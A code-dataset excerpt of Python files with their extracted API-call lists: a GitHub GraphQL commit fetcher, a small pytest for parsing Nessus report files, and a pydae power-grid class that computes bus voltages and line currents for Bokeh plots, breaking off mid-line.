json\n'), ((9798, 9834), 'pprint.pformat', 'pformat', (["existing_policy['bindings']"], {}), "(existing_policy['bindings'])\n", (9805, 9834), False, 'from pprint import pformat\n'), ((9932, 9949), 'pprint.pformat', 'pformat', (['bindings'], {}), '(bindings)\n', (9939, 9949), False, 'from pprint import pformat\n'), ((29117, 29147), 'json.dumps', 'json.dumps', (['manifest'], {'indent': '(2)'}), '(manifest, indent=2)\n', (29127, 29147), False, 'import json\n'), ((29633, 29663), 'json.dumps', 'json.dumps', (['manifest'], {'indent': '(2)'}), '(manifest, indent=2)\n', (29643, 29663), False, 'import json\n'), ((14546, 14573), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (14556, 14573), False, 'import json\n'), ((14751, 14779), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (14761, 14779), False, 'import json\n'), ((23361, 23388), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (23371, 23388), False, 'import json\n'), ((23559, 23587), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (23569, 23587), False, 'import json\n'), ((26130, 26157), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (26140, 26157), False, 'import json\n'), ((26363, 26391), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (26373, 26391), False, 'import json\n'), ((27825, 27852), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (27835, 27852), False, 'import json\n'), ((28035, 28063), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (28045, 28063), False, 'import json\n'), ((7049, 7076), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (7059, 7076), False, 'import json\n'), ((7159, 7177), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (7169, 7177), False, 'import json\n'), ((7755, 7782), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (7765, 7782), False, 'import json\n'), ((7865, 7883), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (7875, 7883), False, 'import json\n')]
import logging from typing import List, Optional from src.constants import PR_FILES from src.data.github.graphql.models import RawCommit from src.data.github.graphql.template import ( GraphQLError, GraphQLErrorAuth, GraphQLErrorMissingNode, GraphQLErrorTimeout, get_template, ) def get_commits( node_ids: List[str], access_token: Optional[str] = None ) -> List[Optional[RawCommit]]: """ Gets all repository data from graphql :param access_token: GitHub access token :param node_ids: List of node ids :return: List of commits """ if PR_FILES == 0: # type: ignore query = { "variables": {"ids": node_ids}, "query": """ query getCommits($ids: [ID!]!) { nodes(ids: $ids) { ... on Commit { additions deletions changedFiles url } } } """, } else: query = { "variables": {"ids": node_ids, "first": PR_FILES}, "query": """ query getCommits($ids: [ID!]!, $first: Int!) { nodes(ids: $ids) { ... on Commit { additions deletions changedFiles url associatedPullRequests(first: 1) { nodes { changedFiles additions deletions files(first: $first) { nodes { path additions deletions } } } } } } } """, } try: raw_commits = get_template(query, access_token)["data"]["nodes"] except GraphQLErrorMissingNode as e: return ( get_commits(node_ids[: e.node], access_token) + [None] + get_commits(node_ids[e.node + 1 :], access_token) ) except (GraphQLErrorAuth, GraphQLErrorTimeout): return [None for _ in node_ids] except GraphQLError as e: logging.exception(e) return [None for _ in node_ids] out: List[Optional[RawCommit]] = [] for raw_commit in raw_commits: try: if "associatedPullRequests" not in raw_commit: raw_commit["associatedPullRequests"] = {"nodes": []} out.append(RawCommit.parse_obj(raw_commit)) except Exception as e: logging.exception(e) out.append(None) return out
[ "src.data.github.graphql.models.RawCommit.parse_obj", "src.data.github.graphql.template.get_template", "logging.exception" ]
[((2516, 2536), 'logging.exception', 'logging.exception', (['e'], {}), '(e)\n', (2533, 2536), False, 'import logging\n'), ((2124, 2157), 'src.data.github.graphql.template.get_template', 'get_template', (['query', 'access_token'], {}), '(query, access_token)\n', (2136, 2157), False, 'from src.data.github.graphql.template import GraphQLError, GraphQLErrorAuth, GraphQLErrorMissingNode, GraphQLErrorTimeout, get_template\n'), ((2817, 2848), 'src.data.github.graphql.models.RawCommit.parse_obj', 'RawCommit.parse_obj', (['raw_commit'], {}), '(raw_commit)\n', (2836, 2848), False, 'from src.data.github.graphql.models import RawCommit\n'), ((2893, 2913), 'logging.exception', 'logging.exception', (['e'], {}), '(e)\n', (2910, 2913), False, 'import logging\n')]
#!/usr/bin/env python # -*- coding: utf-8 -*- """ test_ness ---------------------------------- Tests for `ness` module. """ import pytest import ness def test_parse_report(): report = ness.from_file('sample.nessus') assert len(report.get('hosts')) == 1 print(report) def test_parse_from_file(): with pytest.raises(FileNotFoundError): ness.from_file('not-existant-path')
[ "pytest.raises", "ness.from_file" ]
[((195, 226), 'ness.from_file', 'ness.from_file', (['"""sample.nessus"""'], {}), "('sample.nessus')\n", (209, 226), False, 'import ness\n'), ((325, 357), 'pytest.raises', 'pytest.raises', (['FileNotFoundError'], {}), '(FileNotFoundError)\n', (338, 357), False, 'import pytest\n'), ((367, 402), 'ness.from_file', 'ness.from_file', (['"""not-existant-path"""'], {}), "('not-existant-path')\n", (381, 402), False, 'import ness\n')]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ 2020 @author: jmmauricio """ import numpy as np from pydae.tools import get_v,get_i,get_s import json from collections import namedtuple import numba class grid(object): def __init__(self,syst): #def bokeh_tools(data): self.syst = syst self.s_radio_scale = 0.01 self.s_radio_max = 20 self.s_radio_min = 1 with np.load('matrices.npz') as data: Y_primitive = data['Y_primitive'] A_conect = data['A_conect'] nodes_list = data['nodes_list'] node_sorter = data['node_sorter'] Y_vv = data['Y_vv'] Y_vi = data['Y_vi'] N_v = int(data['N_v']) self.nodes_list = nodes_list self.Y_primitive = Y_primitive self.A_conect = A_conect self.node_sorter = node_sorter self.Y_vv = Y_vv self.Y_vi = Y_vi self.N_v = N_v json_file = 'grid_data.json' json_file = json_file json_data = open(json_file).read().replace("'",'"') data = json.loads(json_data) self.buses = data['buses'] if 'transformers' in data: self.transformers = data['transformers'] else: self.transformers = [] self.lines = data['lines'] self.loads = data['loads'] if 'vscs' in data: self.vscs = data['vscs'] else: self.vscs = [] def dae2vi(self): ''' For obtaining line currents from node voltages after power flow is solved. Returns ------- None. ''' n2a = {'1':'a','2':'b','3':'c','4':'n'} a2n = {'a':1,'b':2,'c':3,'n':4} V_node_list = [] I_node_list = [0.0]*len(self.nodes_list) self.I_node_list = I_node_list for item in self.nodes_list: bus_name,phase_name = item.split('.') #i = get_i(self.syst,bus_name,phase_name=n2a[phase_name],i_type='phasor',dq_name='ri') #I_node_list += [i] v = get_v(self.syst,bus_name,phase_name=n2a[phase_name],v_type='phasor',dq_name='ri') V_node_list += [v] V_node = np.array(V_node_list).reshape(len(V_node_list),1) V_known = np.copy(V_node[:self.N_v]) V_unknown = np.copy(V_node[self.N_v:]) I_unknown = self.Y_vv @ V_known + self.Y_vi @ V_unknown #self.I_node = I_node self.V_node = V_node self.I_unknown = I_unknown self.I_known = np.array(I_node_list).reshape(len(I_node_list),1) self.I_node = np.vstack((self.I_unknown,self.I_known)) for load in self.loads: bus_name = load['bus'] if load['type'] == '3P+N': for ph in ['a','b','c','n']: idx = list(self.nodes_list).index(f"{load['bus']}.{a2n[ph]}") i_ = get_i(self.syst,'load_' + bus_name,phase_name=ph,i_type='phasor',dq_name='ri') self.I_node[idx] += i_ if load['type'] == '1P+N': ph = load['bus_nodes'][0] idx = list(self.nodes_list).index(f"{load['bus']}.{ph}") i_ = get_i(self.syst,'load_' + bus_name,phase_name=n2a[str(ph)],i_type='phasor',dq_name='ri') self.I_node[idx] += i_ ph = load['bus_nodes'][1] idx = list(self.nodes_list).index(f"{load['bus']}.{ph}") i_ = get_i(self.syst,'load_' + bus_name,phase_name=n2a[str(ph)],i_type='phasor',dq_name='ri') self.I_node[idx] += i_ for vsc in self.vscs: bus_name = vsc['bus_ac'] phases = ['a','b','c','n'] if vsc['type'] == 'ac3ph3wvdcq' or vsc['type'] == 'ac3ph3wpq': phases = ['a','b','c'] for ph in phases: idx = list(self.nodes_list).index(f"{vsc['bus_ac']}.{a2n[ph]}") i_ = get_i(self.syst,'vsc_' + bus_name,phase_name=ph,i_type='phasor',dq_name='ri') self.I_node[idx] += i_ if not vsc['type'] == 'ac3ph3wvdcq' or vsc['type'] == 'ac3ph3wpq': bus_name = vsc['bus_dc'] for ph in ['a','n']: idx = list(self.nodes_list).index(f"{vsc['bus_dc']}.{a2n[ph]}") i_ = get_i(self.syst,'vsc_' + bus_name,phase_name=ph,i_type='phasor',dq_name='r') self.I_node[idx] += i_ I_lines = self.Y_primitive @ self.A_conect.T @ self.V_node self.I_lines = I_lines def get_v(self): ''' Compute phase-neutral and phase-phase voltages from power flow solution and put values in buses dictionary. ''' res = {} V_sorted = [] I_sorted = [] S_sorted = [] start_node = 0 self.V_results = self.V_node # self.I_results = self.I_node V_sorted = self.V_node[self.node_sorter] I_sorted = self.I_node[self.node_sorter] nodes2string = ['v_an','v_bn','v_cn','v_gn'] for bus in self.buses: N_nodes = bus['N_nodes'] # for node in range(5): # bus_node = '{:s}.{:s}'.format(str(bus['bus']),str(node)) # if bus_node in self.nodes: # V = self.V_results[self.nodes.index(bus_node)][0] # V_sorted += [V] # nodes_in_bus += [node] # for node in range(5): # bus_node = '{:s}.{:s}'.format(str(bus['bus']),str(node)) # if bus_node in self.nodes: # I = self.I_results[self.nodes.index(bus_node)][0] # I_sorted += [I] if N_nodes==3: # if 3 phases v_ag = V_sorted[start_node+0,0] v_bg = V_sorted[start_node+1,0] v_cg = V_sorted[start_node+2,0] i_a = I_sorted[start_node+0,0] i_b = I_sorted[start_node+1,0] i_c = I_sorted[start_node+2,0] s_a = (v_ag)*np.conj(i_a) s_b = (v_bg)*np.conj(i_b) s_c = (v_cg)*np.conj(i_c) start_node += 3 bus.update({'v_an':np.abs(v_ag), 'v_bn':np.abs(v_bg), 'v_cn':np.abs(v_cg), 'v_ng':0.0}) bus.update({'deg_an':np.angle(v_ag, deg=True), 'deg_bn':np.angle(v_bg, deg=True), 'deg_cn':np.angle(v_cg, deg=True), 'deg_ng':np.angle(0, deg=True)}) bus.update({'v_ab':np.abs(v_ag-v_bg), 'v_bc':np.abs(v_bg-v_cg), 'v_ca':np.abs(v_cg-v_ag)}) bus.update({'p_a':s_a.real, 'p_b':s_b.real, 'p_c':s_c.real}) bus.update({'q_a':s_a.imag, 'q_b':s_b.imag, 'q_c':s_c.imag}) tup = namedtuple('tup',['v_ag', 'v_bg', 'v_cg']) res.update({bus['bus']:tup(v_ag,v_bg,v_cg)}) if N_nodes==4: # if 3 phases + neutral v_ag = V_sorted[start_node+0,0] v_bg = V_sorted[start_node+1,0] v_cg = V_sorted[start_node+2,0] v_ng = V_sorted[start_node+3,0] i_a = I_sorted[start_node+0,0] i_b = I_sorted[start_node+1,0] i_c = I_sorted[start_node+2,0] i_n = I_sorted[start_node+3,0] v_an = v_ag-v_ng v_bn = v_bg-v_ng v_cn = v_cg-v_ng s_a = (v_an)*np.conj(i_a) s_b = (v_bn)*np.conj(i_b) s_c = (v_cn)*np.conj(i_c) bus.update({'v_an':np.abs(v_an), 'v_bn':np.abs(v_bn), 'v_cn':np.abs(v_cn), 'v_ng':np.abs(v_ng)}) bus.update({'deg_an':np.angle(v_ag-v_ng, deg=True), 'deg_bn':np.angle(v_bg-v_ng, deg=True), 'deg_cn':np.angle(v_cg-v_ng, deg=True), 'deg_ng':np.angle(v_ng, deg=True)}) bus.update({'v_ab':np.abs(v_ag-v_bg), 'v_bc':np.abs(v_bg-v_cg), 'v_ca':np.abs(v_cg-v_ag)}) bus.update({'p_a':s_a.real, 'p_b':s_b.real, 'p_c':s_c.real}) bus.update({'q_a':s_a.imag, 'q_b':s_b.imag, 'q_c':s_c.imag}) start_node += 4 tup = namedtuple('tup',['v_ag', 'v_bg', 'v_cg', 'v_ng','v_an', 'v_bn', 'v_cn']) res.update({bus['bus']:tup(v_ag,v_bg,v_cg,v_ng,v_an,v_bn,v_cn)}) self.V = np.array(V_sorted).reshape(len(V_sorted),1) self.res = res return 0 #self.V def get_i(self): ''' Compute line currents from power flow solution and put values in transformers and lines dictionaries. ''' I_lines =self.I_lines it_single_line = 0 for trafo in self.transformers: if 'conductors_j' in trafo: cond_1 = trafo['conductors_j'] else: cond_1 = trafo['conductors_1'] if 'conductors_k' in trafo: cond_2 = trafo['conductors_k'] else: cond_2 = trafo['conductors_2'] I_1a = (I_lines[it_single_line,0]) I_1b = (I_lines[it_single_line+1,0]) I_1c = (I_lines[it_single_line+2,0]) I_1n = (I_lines[it_single_line+3,0]) I_2a = (I_lines[it_single_line+cond_1+0,0]) I_2b = (I_lines[it_single_line+cond_1+1,0]) I_2c = (I_lines[it_single_line+cond_1+2,0]) if cond_1>3: I_1n = (I_lines[it_single_line+cond_1+3,0]) if cond_2>3: I_2n = (I_lines[it_single_line+cond_2+3,0]) #I_n = (I_lines[it_single_line+3,0]) if cond_1 <=3: I_1n = I_1a+I_1b+I_1c if cond_2 <=3: I_2n = I_2a+I_2b+I_2c it_single_line += cond_1 + cond_2 trafo.update({'i_1a_m':np.abs(I_1a)}) trafo.update({'i_1b_m':np.abs(I_1b)}) trafo.update({'i_1c_m':np.abs(I_1c)}) trafo.update({'i_1n_m':np.abs(I_1n)}) trafo.update({'i_2a_m':np.abs(I_2a)}) trafo.update({'i_2b_m':np.abs(I_2b)}) trafo.update({'i_2c_m':np.abs(I_2c)}) trafo.update({'i_2n_m':np.abs(I_2n)}) trafo.update({'deg_1a':np.angle(I_1a, deg=True)}) trafo.update({'deg_1b':np.angle(I_1b, deg=True)}) trafo.update({'deg_1c':np.angle(I_1c, deg=True)}) trafo.update({'deg_1n':np.angle(I_1n, deg=True)}) trafo.update({'deg_2a':np.angle(I_2a, deg=True)}) trafo.update({'deg_2b':np.angle(I_2b, deg=True)}) trafo.update({'deg_2c':np.angle(I_2c, deg=True)}) trafo.update({'deg_2n':np.angle(I_2n, deg=True)}) self.I_lines = I_lines for line in self.lines: if line['type'] == 'z': N_conductors = len(line['bus_j_nodes']) if N_conductors == 3: I_a = (I_lines[it_single_line,0]) I_b = (I_lines[it_single_line+1,0]) I_c = (I_lines[it_single_line+2,0]) #I_n = (I_lines[it_single_line+3,0]) I_n = I_a+I_b+I_c alpha = alpha = np.exp(2.0/3*np.pi*1j) i_z = 1/3*(I_a+I_b+I_c) i_p = 1.0/3.0*(I_a + I_b*alpha + I_c*alpha**2) i_n = 1.0/3.0*(I_a + I_b*alpha**2 + I_c*alpha) it_single_line += N_conductors line.update({'i_j_a_m':np.abs(I_a)}) line.update({'i_j_b_m':np.abs(I_b)}) line.update({'i_j_c_m':np.abs(I_c)}) line.update({'i_j_n_m':np.abs(I_n)}) line.update({'deg_j_a':np.angle(I_a, deg=True)}) line.update({'deg_j_b':np.angle(I_b, deg=True)}) line.update({'deg_j_c':np.angle(I_c, deg=True)}) line.update({'deg_j_n':np.angle(I_n, deg=True)}) line.update({'i_k_a_m':np.abs(I_a)}) line.update({'i_k_b_m':np.abs(I_b)}) line.update({'i_k_c_m':np.abs(I_c)}) line.update({'i_k_n_m':np.abs(I_n)}) line.update({'deg_k_a':np.angle(I_a, deg=True)}) line.update({'deg_k_b':np.angle(I_b, deg=True)}) line.update({'deg_k_c':np.angle(I_c, deg=True)}) line.update({'deg_k_n':np.angle(I_n, deg=True)}) line.update({'i_z':np.abs(i_z)}) line.update({'i_p':np.abs(i_p)}) line.update({'i_n':np.abs(i_n)}) if N_conductors == 4: I_a = (I_lines[it_single_line,0]) I_b = (I_lines[it_single_line+1,0]) I_c = (I_lines[it_single_line+2,0]) I_n = (I_lines[it_single_line+3,0]) it_single_line += N_conductors line.update({'i_j_a_m':np.abs(I_a)}) line.update({'i_j_b_m':np.abs(I_b)}) line.update({'i_j_c_m':np.abs(I_c)}) line.update({'i_j_n_m':np.abs(I_n)}) line.update({'deg_j_a':np.angle(I_a, deg=True)}) line.update({'deg_j_b':np.angle(I_b, deg=True)}) line.update({'deg_j_c':np.angle(I_c, deg=True)}) line.update({'deg_j_n':np.angle(I_n, deg=True)}) line.update({'i_k_a_m':np.abs(I_a)}) line.update({'i_k_b_m':np.abs(I_b)}) line.update({'i_k_c_m':np.abs(I_c)}) line.update({'i_k_n_m':np.abs(I_n)}) line.update({'deg_k_a':np.angle(I_a, deg=True)}) line.update({'deg_k_b':np.angle(I_b, deg=True)}) line.update({'deg_k_c':np.angle(I_c, deg=True)}) line.update({'deg_k_n':np.angle(I_n, deg=True)}) if line['type'] == 'pi': N_conductors = len(line['bus_j_nodes']) if N_conductors == 3: I_j_a = I_lines[it_single_line+0,0]+I_lines[it_single_line+3,0] I_j_b = I_lines[it_single_line+1,0]+I_lines[it_single_line+4,0] I_j_c = I_lines[it_single_line+2,0]+I_lines[it_single_line+5,0] I_k_a = I_lines[it_single_line+0,0]-I_lines[it_single_line+6,0] I_k_b = I_lines[it_single_line+1,0]-I_lines[it_single_line+7,0] I_k_c = I_lines[it_single_line+2,0]-I_lines[it_single_line+8,0] #I_n = (I_lines[it_single_line+3,0]) I_j_n = I_j_a+I_j_b+I_j_c I_k_n = I_k_a+I_k_b+I_k_c alpha = alpha = np.exp(2.0/3*np.pi*1j) i_z = 1/3*(I_j_a+I_j_b+I_j_c) i_p = 1.0/3.0*(I_j_a + I_j_b*alpha + I_j_c*alpha**2) i_n = 1.0/3.0*(I_j_a + I_j_b*alpha**2 + I_j_c*alpha) it_single_line += N_conductors*3 line.update({'i_j_a_m':np.abs(I_j_a)}) line.update({'i_j_b_m':np.abs(I_j_b)}) line.update({'i_j_c_m':np.abs(I_j_c)}) line.update({'i_j_n_m':np.abs(I_j_n)}) line.update({'deg_j_a':np.angle(I_j_a, deg=True)}) line.update({'deg_j_b':np.angle(I_j_b, deg=True)}) line.update({'deg_j_c':np.angle(I_j_c, deg=True)}) line.update({'deg_j_n':np.angle(I_j_n, deg=True)}) line.update({'i_k_a_m':np.abs(I_k_a)}) line.update({'i_k_b_m':np.abs(I_k_b)}) line.update({'i_k_c_m':np.abs(I_k_c)}) line.update({'i_k_n_m':np.abs(I_k_n)}) line.update({'deg_k_a':np.angle(I_k_a, deg=True)}) line.update({'deg_k_b':np.angle(I_k_b, deg=True)}) line.update({'deg_k_c':np.angle(I_k_c, deg=True)}) line.update({'deg_k_n':np.angle(I_k_n, deg=True)}) line.update({'i_z':np.abs(i_z)}) line.update({'i_p':np.abs(i_p)}) line.update({'i_n':np.abs(i_n)}) if N_conductors == 4: I_j_a = I_lines[it_single_line+0,0]+I_lines[it_single_line+3,0] I_j_b = I_lines[it_single_line+1,0]+I_lines[it_single_line+4,0] I_j_c = I_lines[it_single_line+2,0]+I_lines[it_single_line+5,0] I_k_a = I_lines[it_single_line+0,0]-I_lines[it_single_line+6,0] I_k_b = I_lines[it_single_line+1,0]-I_lines[it_single_line+7,0] I_k_c = I_lines[it_single_line+2,0]-I_lines[it_single_line+8,0] I_j_n = I_lines[it_single_line+3,0] I_k_n = I_lines[it_single_line+3,0] #I_n = (I_lines[it_single_line+3,0]) I_j_n = I_j_a+I_j_b+I_j_c I_k_n = I_k_a+I_k_b+I_k_c alpha = alpha = np.exp(2.0/3*np.pi*1j) i_z = 1/3*(I_j_a+I_j_b+I_j_c) i_p = 1.0/3.0*(I_j_a + I_j_b*alpha + I_j_c*alpha**2) i_n = 1.0/3.0*(I_j_a + I_j_b*alpha**2 + I_j_c*alpha) it_single_line += N_conductors*3 line.update({'i_j_a_m':np.abs(I_j_a)}) line.update({'i_j_b_m':np.abs(I_j_b)}) line.update({'i_j_c_m':np.abs(I_j_c)}) line.update({'i_j_n_m':np.abs(I_j_n)}) line.update({'deg_j_a':np.angle(I_j_a, deg=True)}) line.update({'deg_j_b':np.angle(I_j_b, deg=True)}) line.update({'deg_j_c':np.angle(I_j_c, deg=True)}) line.update({'deg_j_n':np.angle(I_j_n, deg=True)}) line.update({'i_k_a_m':np.abs(I_k_a)}) line.update({'i_k_b_m':np.abs(I_k_b)}) line.update({'i_k_c_m':np.abs(I_k_c)}) line.update({'i_k_n_m':np.abs(I_k_n)}) line.update({'deg_k_a':np.angle(I_k_a, deg=True)}) line.update({'deg_k_b':np.angle(I_k_b, deg=True)}) line.update({'deg_k_c':np.angle(I_k_c, deg=True)}) line.update({'deg_k_n':np.angle(I_k_n, deg=True)}) def bokeh_tools(self): self.bus_tooltip = ''' <div> bus_id = @bus_id &nbsp &nbsp | u<sub>avg</sub>= @u_avg_pu pu | u<sub>unb</sub>= @v_unb % <table border="1"> <tr> <td>v<sub>an</sub> = @v_an &ang; @deg_an V </td> <td> S<sub>a</sub> = @p_a + j@q_a kVA</td> </tr> <tr> <td> </td> <td>v<sub>ab</sub>= @v_ab V</td> </tr> <tr> <td>v<sub>bn</sub> = @v_bn &ang; @deg_bn V </td><td> S<sub>b</sub> = @p_b + j@q_b kVA</td> </tr> <tr> <td> </td><td>v<sub>bc</sub>= @v_bc V</td> </tr> <tr> <td>v<sub>cn</sub> = @v_cn &ang; @deg_cn V </td> <td>S<sub>c</sub> = @p_c + j@q_c kVA </td> </tr> <tr> <td> </td> <td>v<sub>ca</sub>= @v_ca V</td> </tr> <tr> <td>v<sub>ng</sub> = @v_ng &ang; @deg_ng V</td> <td>S<sub>abc</sub> = @p_abc + j@q_abc kVA </td> </tr> </table> </div> ''' x = [item['pos_x'] for item in self.buses] y = [item['pos_y'] for item in self.buses] bus_id = [item['bus'] for item in self.buses] v_an = ['{:2.2f}'.format(float(item['v_an'])) for item in self.buses] v_bn = ['{:2.2f}'.format(float(item['v_bn'])) for item in self.buses] v_cn = ['{:2.2f}'.format(float(item['v_cn'])) for item in self.buses] v_ng = ['{:2.2f}'.format(float(item['v_ng'])) for item in self.buses] sqrt3=np.sqrt(3) u_avg_pu = [] v_unb = [] for item in self.buses: V_base = float(item['U_kV'])*1000.0/sqrt3 v_an_float = float(item['v_an']) v_bn_float = float(item['v_bn']) v_cn_float = float(item['v_cn']) v_ng_float = float(item['v_ng']) v_abc = np.array([v_an_float,v_bn_float,v_cn_float]) v_avg = np.average(v_abc) unb = float(np.max(np.abs(v_abc-v_avg))/v_avg) v_avg_pu = float(v_avg/V_base) u_avg_pu += ['{:2.3f}'.format(v_avg_pu)] v_unb += ['{:2.1f}'.format(unb*100)] v_an_pu = ['{:2.4f}'.format(float(item['v_an'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses] v_bn_pu = ['{:2.4f}'.format(float(item['v_bn'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses] v_cn_pu = ['{:2.4f}'.format(float(item['v_cn'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses] v_ng_pu = ['{:2.4f}'.format(float(item['v_ng'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses] deg_an = ['{:2.2f}'.format(float(item['deg_an'])) for item in self.buses] deg_bn = ['{:2.2f}'.format(float(item['deg_bn'])) for item in self.buses] deg_cn = ['{:2.2f}'.format(float(item['deg_cn'])) for item in self.buses] deg_ng = ['{:2.2f}'.format(float(item['deg_ng'])) for item in self.buses] v_ab = [item['v_ab'] for item in self.buses] v_bc = [item['v_bc'] for item in self.buses] v_ca = [item['v_ca'] for item in self.buses] p_a = ['{:2.2f}'.format(float(item['p_a']/1000)) for item in self.buses] p_b = ['{:2.2f}'.format(float(item['p_b']/1000)) for item in self.buses] p_c = ['{:2.2f}'.format(float(item['p_c']/1000)) for item in self.buses] q_a = ['{:2.2f}'.format(float(item['q_a']/1000)) for item in self.buses] q_b = ['{:2.2f}'.format(float(item['q_b']/1000)) for item in self.buses] q_c = ['{:2.2f}'.format(float(item['q_c']/1000)) for item in self.buses] p_abc = ['{:2.2f}'.format(float((item['p_a'] +item['p_b']+item['p_c'])/1000)) for item in self.buses] q_abc = ['{:2.2f}'.format(float((item['q_a'] +item['q_b']+item['q_c'])/1000)) for item in self.buses] s_radio = [] s_color = [] for item in self.buses: p_total = item['p_a'] + item['p_b'] + item['p_c'] q_total = item['q_a'] + item['q_b'] + item['q_c'] s_total = np.abs(p_total + 1j*q_total) scale = self.s_radio_scale s_scaled = abs(np.sqrt(s_total))*scale if s_scaled<self.s_radio_min : s_scaled = self.s_radio_min if s_scaled>self.s_radio_max: s_scaled = self.s_radio_max s_radio += [s_scaled] if p_total>0.0: s_color += ['red'] if p_total<0.0: s_color += ['green'] if p_total==0.0: s_color += ['blue'] self.bus_data = dict(x=x, y=y, bus_id=bus_id, u_avg_pu=u_avg_pu, v_unb=v_unb, v_an=v_an, v_bn=v_bn, v_cn=v_cn, v_ng=v_ng, v_an_pu=v_an_pu, v_bn_pu=v_bn_pu, v_cn_pu=v_cn_pu, deg_an=deg_an, deg_bn=deg_bn, deg_cn=deg_cn, deg_ng=deg_ng,v_ab=v_ab,v_bc=v_bc,v_ca=v_ca, p_a=p_a,p_b=p_b,p_c=p_c, q_a=q_a,q_b=q_b,q_c=q_c, p_abc=p_abc,q_abc=q_abc, s_radio=s_radio, s_color=s_color) self.line_tooltip = ''' <div> line id = @line_id <table border="1"> <tr> <td>I<sub>a</sub> = @i_a_m &ang; @deg_a A</td> </tr> <tr> <td>I<sub>b</sub> = @i_b_m &ang; @deg_b A</td> </tr> <tr> <td>I<sub>c</sub> = @i_c_m &ang; @deg_c A</td> </tr> <tr> <td>I<sub>n</sub> = @i_n_m &ang; @deg_n A</td> </tr> </table> </div> ''' self.line_tooltip = ''' <div> line id = @line_id <table border="5"> <tr > <td>I<sub>ja</sub> = @i_j_a_m &ang; @deg_j_a </td> <td>I<sub>ka</sub> = @i_k_a_m &ang; @deg_k_a </td> </tr> <tr> <td >I<sub>jb</sub> = @i_j_b_m &ang; @deg_j_b </td> <td >I<sub>kb</sub> = @i_k_b_m &ang; @deg_k_b </td> </tr> <tr> <td >I<sub>jc</sub> = @i_j_c_m &ang; @deg_j_c </td> <td >I<sub>kc</sub> = @i_k_c_m &ang; @deg_k_c </td> </tr> <tr> <td >I<sub>jn</sub> = @i_j_n_m &ang; @deg_j_n </td> <td >I<sub>kn</sub> = @i_k_n_m &ang; @deg_k_n </td> </tr> </table> </div> ''' bus_id_to_x = dict(zip(bus_id,x)) bus_id_to_y = dict(zip(bus_id,y)) x_j = [bus_id_to_x[item['bus_j']] for item in self.lines] y_j = [bus_id_to_y[item['bus_j']] for item in self.lines] x_k = [bus_id_to_x[item['bus_k']] for item in self.lines] y_k = [bus_id_to_y[item['bus_k']] for item in self.lines] x_s = [] y_s = [] for line in self.lines: x_s += [[ bus_id_to_x[line['bus_j']] , bus_id_to_x[line['bus_k']]]] y_s += [[ bus_id_to_y[line['bus_j']] , bus_id_to_y[line['bus_k']]]] i_j_a_m = [item['i_j_a_m'] for item in self.lines] i_j_b_m = [item['i_j_b_m'] for item in self.lines] i_j_c_m = [item['i_j_c_m'] for item in self.lines] i_j_n_m = [item['i_j_n_m'] for item in self.lines] i_k_a_m = [item['i_k_a_m'] for item in self.lines] i_k_b_m = [item['i_k_b_m'] for item in self.lines] i_k_c_m = [item['i_k_c_m'] for item in self.lines] i_k_n_m = [item['i_k_n_m'] for item in self.lines] deg_j_a = [item['deg_j_a'] for item in self.lines] deg_j_b = [item['deg_j_b'] for item in self.lines] deg_j_c = [item['deg_j_c'] for item in self.lines] deg_j_n = [item['deg_j_n'] for item in self.lines] deg_k_a = [item['deg_k_a'] for item in self.lines] deg_k_b = [item['deg_k_b'] for item in self.lines] deg_k_c = [item['deg_k_c'] for item in self.lines] deg_k_n = [item['deg_k_n'] for item in self.lines] line_id = ['{:s}-{:s}'.format(item['bus_j'],item['bus_k']) for item in self.lines] # self.line_data = dict(x_j=x_j, x_k=x_k, y_j=y_j, y_k=y_k, line_id=line_id, # i_a_m=i_a_m) self.line_data = dict(x_s=x_s, y_s=y_s, line_id=line_id, i_j_a_m=i_j_a_m, i_j_b_m=i_j_b_m, i_j_c_m=i_j_c_m, i_j_n_m=i_j_n_m, i_k_a_m=i_k_a_m, i_k_b_m=i_k_b_m, i_k_c_m=i_k_c_m, i_k_n_m=i_k_n_m, deg_j_a=deg_j_a, deg_j_b=deg_j_b, deg_j_c=deg_j_c, deg_j_n=deg_j_n, deg_k_a=deg_k_a, deg_k_b=deg_k_b, deg_k_c=deg_k_c, deg_k_n=deg_k_n) self.transformer_tooltip = ''' <div> transformer id = @trafo_id <table border="5"> <tr > <td>I<sub>1a</sub> = @i_1a_m &ang; @deg_1a </td> <td>I<sub>2a</sub> = @i_2a_m &ang; @deg_2a </td> </tr> <tr> <td >I<sub>1b</sub> = @i_1b_m &ang; @deg_1b </td> <td >I<sub>2b</sub> = @i_2b_m &ang; @deg_2b </td> </tr> <tr> <td >I<sub>1c</sub> = @i_1c_m &ang; @deg_1c </td> <td >I<sub>2c</sub> = @i_2c_m &ang; @deg_2c </td> </tr> <tr> <td >I<sub>1n</sub> = @i_1n_m &ang; @deg_1n </td> <td >I<sub>2n</sub> = @i_2n_m &ang; @deg_2n </td> </tr> </table> </div> ''' bus_id_to_x = dict(zip(bus_id,x)) bus_id_to_y = dict(zip(bus_id,y)) x_j = [bus_id_to_x[item['bus_j']] for item in self.transformers] y_j = [bus_id_to_y[item['bus_j']] for item in self.transformers] x_k = [bus_id_to_x[item['bus_k']] for item in self.transformers] y_k = [bus_id_to_y[item['bus_k']] for item in self.transformers] x_s = [] y_s = [] for line in self.transformers: x_s += [[ bus_id_to_x[line['bus_j']] , bus_id_to_x[line['bus_k']]]] y_s += [[ bus_id_to_y[line['bus_j']] , bus_id_to_y[line['bus_k']]]] i_1a_m = [item['i_1a_m'] for item in self.transformers] i_1b_m = 